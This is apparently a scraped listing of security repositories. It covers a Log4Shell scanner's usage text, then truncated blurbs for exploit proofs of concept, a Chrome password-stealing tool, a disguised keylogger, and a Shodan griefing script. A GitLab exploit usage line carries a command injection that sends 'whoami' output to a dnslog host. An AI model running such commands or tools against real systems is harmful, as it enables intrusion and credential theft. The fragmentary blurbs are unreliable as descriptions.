CVE-2021-44228 log4j 2.x rce漏洞检测工具,对目标链接发起get请求并利用dnslog探测是否有回显
$ python3 log4j-scan.py -h
Usage: python log4j-scan.py -u <target url>
Options:
-h, --help show this help message and exit
-u URL, --url=URL 输入需要检查的链接,如: https://ainrm.cn
-u形式传入链接
ChromePE [Linux/Windows] Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, download
🐞 Log4Scan 🔧 Log4Shell 简单的主动和被动扫描脚本 Log4scan 针对header头和fuzz参数的主动批量扫描,用于大批量黑盒检测
CVE-2021-41773 PoC Proof of concept to check if hosts are vulnerable to CVE-2021-41773. Description (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CV
netrecon A gui application used for network reconnaissance while pentesting
0x101 Show registered storage files of apps by jailbreak Legal disclaimer: Usage of insTof for attacking targets without prior mutual consent is illeg
tinyman_exploit_finder There was a big tinyman exploit. You can read about it he
brute_smb_share I wrote this small PoC after bumping into SMB servers where Hydr
Django Protected Media Django Protected Media is a Django app that manages media that are considered sensitive in a protected fashion. Not only does t
CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-R
f5-waf-enforce-sigs-CVE-2021-44228 This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device Overview This script enforce
Some Attacks of Exchange SSRF This project is heavily replicated in ProxyShell, NtlmRelayToEWS https://mp.weixin.qq.com/s/GFcEKA48bPWsezNdVcrWag Get 1
Keylogger_ Um keylogger que se disfarça de um app que tira print da tela. Este programa captura o print da tela e salva ,normalmente, na pasta Picture
Provides script to download and format public IP lists related to the Log4j exploit. Current format includes: plain list, Cisco ASA Network Group.
GriefBuddy This script searches Shodan for Minecraft server IPs to grief. This will return all servers connected to the public internet which Shodan h
PassVault What Is It? It is a command-line password manager, for educational purposes, that stores localy, in AES encryption, your sensitives datas in
CVE-2021-43798 – Grafana Exploit About This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798
Crypto Meta Extractor This repository contains the code which extracts some metadata of all the cryptocurrencies listed (9K) on CoinMarketCap. Coding
CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog
Raphael Raphael是一款基于Python3开发的插件式漏洞扫描工具。 Raphael is a vulnerability scanning too
JS Deobfuscation is a Python script that deobfuscate JS code and it's time saver for you. Although it may not work with high degrees of obfuscation, it's a pretty nice tool to help you even if it's j
3 Oct 05, 2022
6 Aug 04, 2022
43 Nov 09, 2022
4 Sep 03, 2022
4 Oct 24, 2022
9 Dec 27, 2022
3 Feb 21, 2022
46 Nov 12, 2022
104 Dec 08, 2022
5 Mar 31, 2022
129 Dec 30, 2022
1 Dec 03, 2021
1 Jan 02, 2022
26 Dec 29, 2022
5 Aug 15, 2022
12 Nov 18, 2022
3 Jul 03, 2022
70 Nov 09, 2022
5 Mar 21, 2022
3 May 01, 2022